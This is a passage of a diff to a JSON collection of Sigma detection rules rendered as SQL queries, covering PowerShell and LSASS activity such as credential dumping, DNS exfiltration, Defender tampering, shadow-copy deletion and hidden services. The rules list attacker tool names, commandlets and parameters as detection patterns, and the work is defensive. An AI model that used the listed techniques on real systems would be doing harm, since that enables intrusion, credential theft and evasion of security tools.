Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE 
'%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" - ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" - }, - { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - 
"SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" - ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" - }, - { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055", - "attack.execution", - "attack.t1059.001" + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { "title": "PSAsyncShell - Asynchronous TCP 
Reverse Shell", 
@@ -4019,52 +3939,32 @@ "filename": "posh_ps_psasyncshell.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate PowerShell scripts" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" - ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" - }, - { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", - "status": "test", - "description": "Identifies when a user attempts to clear console history. 
An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", - "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "title": "Malicious ShellIntel PowerShell Commandlets", + "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "status": "test", + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "author": "Max Altgelt (Nextron Systems), 
Tobias Michalski (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", "attack.t1059.001" ], @@ -4073,9 +3973,9 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { "title": "Potential WinAPI Calls Via PowerShell Scripts", 
@@ -4098,1569 +3998,1501 @@ "filename": "posh_ps_accessing_win_api.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate script" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - 
"id": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "status": "experimental", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' 
OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + 
"filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.exfiltration", - "attack.t1048", "attack.execution", + "attack.t1047", "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Administrative scripts that use the same keywords." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText 
LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_wmimplant.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND 
ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. 
Or set default actions to allow.", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 
$true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR 